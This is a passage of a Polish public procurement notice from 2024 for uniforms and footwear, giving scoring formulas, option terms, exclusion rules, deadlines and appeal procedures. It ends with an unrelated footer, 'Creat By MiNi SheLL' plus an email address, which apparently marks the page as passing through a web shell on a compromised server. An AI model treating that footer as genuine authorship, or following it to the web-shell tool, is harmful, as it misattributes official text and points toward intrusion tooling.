ceny<br/>	Cmin	–	cena najniższa wśród cen zawartych w ofertach<br/>	C(x)	–	cena zawarta w ocenianej ofercie „x”<br/><br/>2.2 Funkcjonalność użytkowa, jakość - U(X)<br/><br/>W tym kryterium, każdy z członków komisji oceny ofert ocenia indywidualnie przedmiot zamówienia, oceniając poniższe podkryteria (ppkt 2.2.3) i przyznając punkty:<br/><br/>Wzór ogólny do obliczenia kryterium „funkcjonalność użytkowa, jakość”:<br/>U(x)= (F(o)/F(x)) x 100 x 40%<br/>Gdzie:	<br/>	U(x)	–	ilość punktów przyznana ofercie „x” za funkcjonalność użytkową, jakość<br/><br/>	F(o)	– Liczba punktów przyznana ofercie ocenianej<br/>	F (x)	– Największa liczba punktów spośród ocenianych ofert<br/><br/>2.2.1. Kryterium „funkcjonalność użytkowa, jakość” podlega indywidualnej ocenie członków komisji oceny ofert na podstawie dostarczonych próbek przez Wykonawców.<br/>2.2.2. Przy ocenie kryterium „funkcjonalność użytkowa, jakość” będą brane pod uwagę podkryteria związane z funkcjonalnością i jakością - przy zastosowaniu następującego wzoru:<br/>F(o)= (F1 +F2 + F3 + F4)/ΣK <br/>Gdzie:<br/>F1 + F2 +F3 +F4 - suma punktów przyznana indywidualnie przez członków oceny ofert<br/>Σ K - ilość członków komisji oceny ofert<br/><br/>2.2.3. W kryterium „jakość, funkcjonalność użytkowa” członkowie komisji oceny ofert oceniać będą poniższe aspekty i przyznawać punkty:<br/>Kurtka przeciwdeszczowa –damska, męska<br/>a) jakość i staranność wykonania połączeń: zszycia, sklejenia, podklejenia taśmą na gorąco bez fałd, zgrubień, zabezpieczenia wodoszczelne,<br/>1 pkt – zszycie, wiązanie ściegu, podklejenia taśmą na gorąco, zabezpieczenia wodoszczelne wykonane niesymetrycznie,<br/>2 pkt – zszycie, wiązanie ściegu podklejenia taśmą na gorąco bez fałd, zgrubień, zabezpieczenia wodoszczelne wykonane prawidłowo, starannie;<br/>b) dopasowanie rozmiarowe na żywy model<br/>1 pkt – niedopasowany krój, luźny<br/>2 pkt – dopasowany krój.<br/>c) funkcjonalność zastosowanych dodatków tj; zamki błyskawiczne, zapinki, regulacje obwodów kaptura, dołu kurtki<br/>1 pkt – zamek dwusuwakowy<br/>2 pkt – możliwość schowania kaptura w kołnierz.<br/>Spodnie przeciwdeszczowe damskie, męskie<br/>a) jakość i staranność wykonania połączeń: podklejenia taśmą na gorąco bez fałd, zgrubień,<br/>zabezpieczenia wodoszczelne,<br/>1 pkt – zabezpieczenia wodoszczelne wykonane niedbale<br/>3 pkt – zabezpieczenia wodoszczelne wykonane prawidłowo, starannie<br/><br/>b) funkcjonalność zastosowanych dodatków tj; zamki błyskawiczne, regulacje obwodów nogawek, pasa,<br/>1 pkt – regulowany obwód spodni w talii<br/>2 pkt – spodnie na bokach rozpinane na całej długości, zamek bryzgoszczelny.<br/>1 pkt – wzmocnienia tylnej części spodni i kolan<br/>c) jakość użytych materiałów w oparciu o przedstawione dokumenty, certyfikaty, karty technologiczne, <br/>1 pkt – wodoodporność: = 10000mm ,<br/>2 pkt – wodoodporność: wodoodporność &gt;10000mm ≤20000mm<br/>3 pkt – wodoodporność: &gt;20000mm,</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">JAKOŚĆ, FUNKCJONALNOŚĆ UŻYTKOWA</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Półbuty do munduru polowego - damskie 17 par; męskie 30 par </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">18000000-9 - Odzież, obuwie, artykuły bagażowe i dodatki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1) Wskazana w SWZ ilość poszczególnych sortów mundurowych i sortów BHP ma charakter szacunkowy i może ulec<br/>zmianie w przypadku skorzystania prawa opcji. Jest to uzależnione od rotacji kadrowej pracowników.<br/>2) Opcjonalnie Zamawiający jest uprawniony zlecić Wykonawcy dodatkowy zakres rzeczowy obejmujący dostawy<br/>analogiczne jak opisane w SWZ („Opcja”). Zamawiający nie jest zobowiązany do zlecenia dostaw objętych przedmiotem<br/>Opcji, a Wykonawcy nie służy roszczenie o ich zlecenie.<br/>3) Dostawy będące przedmiotem Opcji mogą zostać zlecone na wartość do 20% podstawowego zakresu rzeczowego<br/>Umowy określonego w opisie przedmiotu zamówienia.<br/>4) Zlecanie dostaw będących przedmiotem Opcji, ich odbiór, ustalenie wartości tych dostaw, uiszczanie zapłaty oraz<br/>odpowiedzialność za ich niewykonanie lub nienależyte wykonanie, w tym odpowiedzialność w postaci kar umownych, jak<br/>również realizacja uprawnień Zamawiającego wynikających z Umowy, w tym realizacja prawa do odstąpienia od Umowy<br/>następować będzie na analogicznych zasadach, jak w przypadku prac będących Przedmiotem Umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">88 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny oferty i ich waga.<br/>1. Przy wyborze najkorzystniejszej oferty, Zamawiający będzie kierował się następującym<br/>kryterium:<br/>A. CENA – 60 %<br/>J. JAKOŚĆ –40 %<br/><br/>2. Ocena ofert będzie dokonywana wg następujących zasad:<br/>2.1. Cena - A(X):<br/>a) przyjmuje się, że najwyższą ilość punktów tj. 60 otrzyma cena najniższa wśród cen zawartych w ofertach<br/>b) ceny w pozostałych ofertach punktowane będą w oparciu o następujący wzór:<br/>A(x) = (Cmin/C(x))x 100 x 60%<br/>Gdzie:	<br/>	A(x)	–	ilość punktów przyznana ofercie „x” za kryterium ceny<br/>	Cmin	–	cena najniższa wśród cen zawartych w ofertach<br/>	C(x)	–	cena zawarta w ocenianej ofercie „x”<br/><br/>2.2 Jakość - J(X)<br/>W tym kryterium, każdy z członków komisji oceny ofert ocenia indywidualnie przedmiot zamówienia, oceniając poniższe podkryteria (ppkt 2.2.3) i przyznając punkty:<br/>Wzór ogólny do obliczenia kryterium „jakość”:<br/>J(x)= (F(o)/F(x)) x 100 x 40 %<br/>Gdzie:	<br/>	J(x)	–	ilość punktów przyznana ofercie „x” za termin wykonania<br/><br/>	F(O)	– Liczba punktów przyznana ofercie ocenianej<br/>	F (x)	– Największa liczba punktów spośród ocenianych ofert<br/><br/>2.2.1. Kryterium „ jakość” podlega indywidualnej ocenie członków komisji oceny ofert na podstawie dostarczonych próbek przez Wykonawców.<br/>2.2.2. Przy ocenie kryterium „jakość” będą brane pod uwagę podkryteria związane z jakością - przy zastosowaniu następującego wzoru:<br/>F(o)= (F1 +F2 + F3 + F4)/ΣK <br/>Gdzie:<br/>F1 + F2 +F3 +F4 - suma punktów przyznana indywidualnie przez członków komisji oceny ofert<br/>Σ K - ilość członków komisji oceny ofert<br/><br/>2.2.3.	W kryterium „jakość” członkowie komisji oceny ofert oceniać będą poniższe aspekty i przyznawać punkty:<br/><br/>Półbuty trekkingowe – damskie, męskie<br/>a) wkładka <br/>1 pkt – niewymienna wkładka,<br/>3 pkt – wymienna wkładka,<br/>2 pkt – wkładka profilowana<br/>b) podeszwa<br/>1 pkt – podeszwa gładka,<br/>2 pkt - podeszwa bieżnikowana,<br/>3 pkt – podeszwa typu Vibram lub Pomoca<br/>c) konstrukcja buta <br/>2 pkt - wzmocniona cholewka buta stabilizujaca stopę<br/>2 pkt - gumowy otok chroniący przód cholewki buta</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Trzewiki z membraną /obuwie terenowe w wersji letniej - damskie - 19 par; męskie-14 par </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">18000000-9 - Odzież, obuwie, artykuły bagażowe i dodatki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1) Wskazana w SWZ ilość poszczególnych sortów mundurowych i sortów BHP ma charakter szacunkowy i może ulec<br/>zmianie w przypadku skorzystania prawa opcji. Jest to uzależnione od rotacji kadrowej pracowników.<br/>2) Opcjonalnie Zamawiający jest uprawniony zlecić Wykonawcy dodatkowy zakres rzeczowy obejmujący dostawy<br/>analogiczne jak opisane w SWZ („Opcja”). Zamawiający nie jest zobowiązany do zlecenia dostaw objętych przedmiotem<br/>Opcji, a Wykonawcy nie służy roszczenie o ich zlecenie.<br/>3) Dostawy będące przedmiotem Opcji mogą zostać zlecone na wartość do 20% podstawowego zakresu rzeczowego<br/>Umowy określonego w opisie przedmiotu zamówienia.<br/>4) Zlecanie dostaw będących przedmiotem Opcji, ich odbiór, ustalenie wartości tych dostaw, uiszczanie zapłaty oraz<br/>odpowiedzialność za ich niewykonanie lub nienależyte wykonanie, w tym odpowiedzialność w postaci kar umownych, jak<br/>również realizacja uprawnień Zamawiającego wynikających z Umowy, w tym realizacja prawa do odstąpienia od Umowy<br/>następować będzie na analogicznych zasadach, jak w przypadku prac będących Przedmiotem Umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">88 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Trzewiki z membraną obuwie terenowe w wersji letniej – damskie, męskie <br/>Kryteria oceny oferty i ich waga.<br/>1. Przy wyborze najkorzystniejszej oferty, Zamawiający będzie kierował się następującym<br/>kryterium:<br/>A. CENA – 60 %<br/>J. JAKOŚĆ –40 %<br/><br/>2. Ocena ofert będzie dokonywana wg następujących zasad:<br/>2.1. Cena - A(X):<br/>a) przyjmuje się, że najwyższą ilość punktów tj. 60 otrzyma cena najniższa wśród cen zawartych w ofertach<br/>b) ceny w pozostałych ofertach punktowane będą w oparciu o następujący wzór:<br/>A(x) = (Cmin/C(x))x 100 x 60%<br/>Gdzie:	<br/>	A(x)	–	ilość punktów przyznana ofercie „x” za kryterium ceny<br/>	Cmin	–	cena najniższa wśród cen zawartych w ofertach<br/>	C(x)	–	cena zawarta w ocenianej ofercie „x”<br/><br/>2.2 Jakość - J(X)<br/>W tym kryterium, każdy z członków komisji oceny ofert ocenia indywidualnie przedmiot zamówienia, oceniając poniższe podkryteria (ppkt 2.2.3) i przyznając punkty:<br/>Wzór ogólny do obliczenia kryterium „jakość”:<br/>J(x)= (F(o)/F(x)) x 100 x 40 %<br/>Gdzie:	<br/>	J(x)	–	ilość punktów przyznana ofercie „x” za termin wykonania<br/><br/>	F(O)	– Liczba punktów przyznana ofercie ocenianej<br/>	F (x)	– Największa liczba punktów spośród ocenianych ofert<br/><br/>2.2.1. Kryterium „ jakość” podlega indywidualnej ocenie członków komisji oceny ofert na podstawie dostarczonych próbek przez Wykonawców.<br/>2.2.2. Przy ocenie kryterium „jakość” będą brane pod uwagę podkryteria związane z jakością - przy zastosowaniu następującego wzoru:<br/>F(o)= (F1 +F2 + F3 + F4)/ΣK <br/>Gdzie:<br/>F1 + F2 +F3 +F4 - suma punktów przyznana indywidualnie przez członków komisji oceny ofert<br/>Σ K - ilość członków komisji oceny ofert<br/><br/>2.2.3.	W kryterium „jakość, funkcjonalność użytkowa” członkowie komisji oceny ofert oceniać będą poniższe aspekty i przyznawać punkty:<br/><br/>Trzewiki z membraną obuwie terenowe w wersji letniej – damskie, męskie<br/>a) Zaczep na raki <br/>2 pkt – kompatybilność z rakami<br/>b) podeszwa <br/>1 pkt – podeszwa zachodząca na czubek obuwia,<br/>2 pkt – podeszwa bieżnikowana,<br/>3 pkt – podeszwa typu Vibram<br/>4 pkt – podeszwa samoczyszcąca,<br/>c) cholewka<br/>1 pkt – gładka cholewka ze skóry<br/>4 pkt – system zapobiegający wygniataniu cholewki</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Zamawiający wezwie<br/>wykonawcę, którego oferta została najwyżej oceniona, do złożenia podmiotowych środków dowodowych, w wyznaczonym terminie,<br/>nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień ich złożenia.<br/>2. W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu Zamawiający żąda następujących<br/>dokumentów:<br/>1) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 p.z.p. o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2023 r. poz. 1689), z innym Wykonawcą,<br/>który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty<br/>częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej<br/>grupy kapitałowej (załącznik nr 4 do SWZ);<br/>2) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>Ogłoszenie nr 2024/BZP 00267338/01 z dnia 2024-04-02<br/>2024-04-02 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;<br/>3. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy poza<br/>terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w Rozdziale XII ust. 2 SWZ:<br/>1) odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej -<br/>składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające<br/>odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł<br/>układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji<br/>wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokumenty powinny być<br/>wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>4. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub miejsce zamieszkania ma osoba, której dokument<br/>dotyczy, nie wydaje się dokumentów, o których mowa w ust. 3, lub gdy dokumenty te nie odnoszą się do wszystkich przypadków,<br/>należy zastąpić je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze<br/>wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone<br/>pod przysięgą, lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba ,<br/>której dokument miał dotyczyć, nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub<br/>administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub<br/>miejsce zamieszkania Wykonawcy.<br/>5. Zamawiający żąda od Wykonawcy przedstawienia podmiotowych środków dowodowych, o których mowa w ust. 2 pkt. 2,<br/>dotyczących podwykonawców niebędących podmiotami udostępniającymi zasoby na zasadach określonych w art. 118 p.z.p.,<br/>potwierdzających, że nie zachodzą wobec tych podwykonawców podstawy wykluczenia z postępowania.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> PAKIET NR 1 <br/>-	Koszula z długim rękawem w kolorze białym – damska, męska<br/><br/>PAKIET NR 2 <br/>-	Kurtka przeciwdeszczowa z logo – damska, męska<br/>-	Spodnie przeciwdeszczowe – damskie, męskie <br/>PAKIET NR 3 <br/>-	Półbuty do munduru polowego – damskie, męskie<br/>PAKIET NR 4<br/>- Trzewiki z membraną /obuwie terenowe w wersji letniej – damskie, męskie <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Załącznik nr 5 - Oświadczenie wspólnych ubiegających art. 117 ust 4; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo reprezentowania w postępowaniu i zawarcia umowy. Do oferty wspólnej Wykonawcy dołączają<br/>pełnomocnictwo.<br/>Pełnomocnik pozostaje w kontakcie z Zamawiającym w toku postępowania i do niego Zamawiający kieruje informacje,<br/>korespondencję, itp.<br/>2. Oferta wspólna, składana przez dwóch lub więcej Wykonawców, powinna spełniać następujące wymagania:<br/>1) oferta wspólna powinna być sporządzona zgodnie z SWZ,<br/>2) sposób składania dokumentów w ofercie wspólnej:<br/>a) dokumenty dotyczące własnej firmy, takie jak np.: oświadczenie o braku podstaw do wykluczenia, składa każdy<br/>zWykonawców składających ofertę wspólną we własnym imieniu;<br/>b) dokumenty wspólne, takie jak np.: formularz ofertowy, dokumenty podmiotowe, składa pełnomocnik Wykonawców w<br/>imieniu wszystkich Wykonawców składających ofertę wspólną.<br/>3. Przed podpisaniem umowy (w przypadku wygrania postępowania) Wykonawcy składający ofertę wspólną będą mieli<br/>obowiązek przedstawić Zamawiającemu umowę konsorcjum, regulującą współpracę wykonawców.<br/>4. Jeśli oferta zawiera informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993 r. o<br/>zwalczaniu nieuczciwej konkurencji (t.j. Dz. U. z 2020 r. poz. 1913), Wykonawca powinien nie później niż w terminie<br/>składania ofert, zastrzec, że nie mogą one być udostępnione oraz wykazać, iż zastrzeżone informacje stanowią tajemnicę<br/>przedsiębiorstwa.<br/>5. Jeżeli oferta zawiera informacje stanowiące tajemnice przedsiębiorstwa w rozumieniu przepisów art. 11 ustawy z dnia 14<br/>kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (t.j. Dz. U. z 2022 r. poz. 1233), wówczas informacje te muszą być<br/>wyodrębnione (zawarte) w osobnym pliku i zawierać wyraźne zastrzeżenie, że nie mogą być udostępnione.<br/>6. Podmiotowe środki dowodowe lub inne dokumenty, w tym dokumenty potwierdzające umocowanie do reprezentowania,<br/>sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język polski. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z :<br/>Załącznik nr 6.1 – projektowane postanowienia umowy Pakiet nr 1<br/>Załącznik nr 6.2 – projektowane postanowienia umowy Pakiet nr 2<br/>Załącznik nr 6.3 - projektowane postanowienia umowy Pakiet nr 3,4 <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-05-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę na platformie e-zamówienia za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy. Po wybraniu przycisku „Złóż ofertę” system prezentuje okno składania oferty umożliwiające przekazanie dokumentów elektronicznych, w którym znajdują się dwa pola drag&amp;drop („przeciągnij” i „upuść”) służące do dodawania plików.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-05-27 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-06-25</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> POUCZENIE O ŚRODKACH OCHRONY PRAWNEJ PRZYSŁUGUJĄCYCH WYKONAWCY<br/>1. Środki ochrony prawnej określone w niniejszym dziale przysługują wykonawcy jeżeli ma lub miał interes w uzyskaniu<br/>zamówienia oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez zamawiającego przepisów ustawy Prawo<br/>zamówień publicznych<br/>2. Środki ochrony prawnej wobec ogłoszenia wszczynającego postępowanie o udzielenie zamówienia oraz dokumentów<br/>zamówienia przysługują również organizacjom wpisanym na listę, o której mowa w art. 469 pkt 15 Prawo zamówień<br/>publicznych oraz Rzecznikowi Małych i Średnich Przedsiębiorców.<br/>3. Odwołanie przysługuje na:<br/>1) niezgodną z przepisami ustawy czynność Zamawiającego, podjętą w postępowaniu o udzielenie zamówienia, w tym na<br/>projektowane postanowienie umowy;<br/>2) zaniechanie czynności w postępowaniu o udzielenie zamówienia, do której Zamawiający był obowiązany na podstawie<br/>ustawy;<br/>4. Odwołanie wnosi się do Prezesa Izby. Odwołujący przekazuje Zamawiającemu odwołanie wniesione w formie<br/>elektronicznej albo postaci elektronicznej albo kopię tego odwołania, jeżeli zostało ono wniesione w formie pisemnej, przed<br/>upływem terminu do wniesienia odwołania w taki sposób, aby mógł on zapoznać się z jego treścią przed upływem tego<br/>terminu.<br/>5. Odwołanie wobec treści ogłoszenia wszczynającego postępowanie o udzielenie zamówienia lub wobec treści<br/>dokumentów zamówienia, wnosi się w terminie 5 dni od dnia zamieszczenia ogłoszenia w Biuletynie Zamówień Publicznych<br/>lub dokumentów zamówienia na stronie internetowej.<br/>6. Odwołanie wnosi się w terminie:<br/>1) 5 dni od dnia przekazania informacji o czynności zamawiającego stanowiącej podstawę jego wniesienia, jeżeli informacja<br/>została przekazana przy użyciu środków komunikacji elektronicznej,<br/>2) 10 dni od dnia przekazania informacji o czynności zamawiającego stanowiącej podstawę jego wniesienia, jeżeli<br/>informacja została przekazana w sposób inny niż określony w ppkt 1.<br/>7. Odwołanie w przypadkach innych niż określone w pkt 5 i 6 wnosi się w terminie 5 dni od dnia, w którym powzięto lub przy<br/>zachowaniu należytej staranności można było powziąć wiadomość o okolicznościach stanowiących podstawę jego<br/>wniesienia.<br/>8. Na orzeczenie Izby oraz postanowienie Prezesa Izby, o którym mowa w art. 519 ust. 1 ustawy Prawo zamówień<br/>publicznych, stronom oraz uczestnikom postępowania odwoławczego przysługuje skarga do sądu.<br/>9. W postępowaniu toczącym się wskutek wniesienia skargi stosuje się odpowiednio przepisy ustawy z dnia 17 listopada<br/>1964 r. - Kodeks postępowania cywilnego o apelacji, jeżeli przepisy niniejszego rozdziału nie stanowią inaczej.<br/>10. Skargę wnosi się do Sądu Okręgowego w Warszawie -sądu zamówień publicznych, zwanego dalej &#34;sądem zamówień<br/>publicznych&#34;.<br/>11. Skargę wnosi się za pośrednictwem Prezesa Izby, w terminie 14 dni od dnia doręczenia orzeczenia Izby lub<br/>postanowienia Prezesa Izby, o którym mowa w art. 519 ust. 1 ustawy Prawo zamówień publicznych, przesyłając<br/>jednocześnie jej odpis przeciwnikowi skargi. Złożenie skargi w placówce pocztowej operatora wyznaczonego w rozumieniu<br/>ustawy z dnia 23 listopada 2012 r. -Prawo pocztowe jest równoznaczne z jej wniesieniem.<br/>12. Prezes Izby przekazuje skargę wraz z aktami postępowania odwoławczego do sądu zamówień publicznych w terminie 7<br/>dni od dnia jej otrzymania.

Creat By MiNi SheLL
Email: jattceo@gmail.com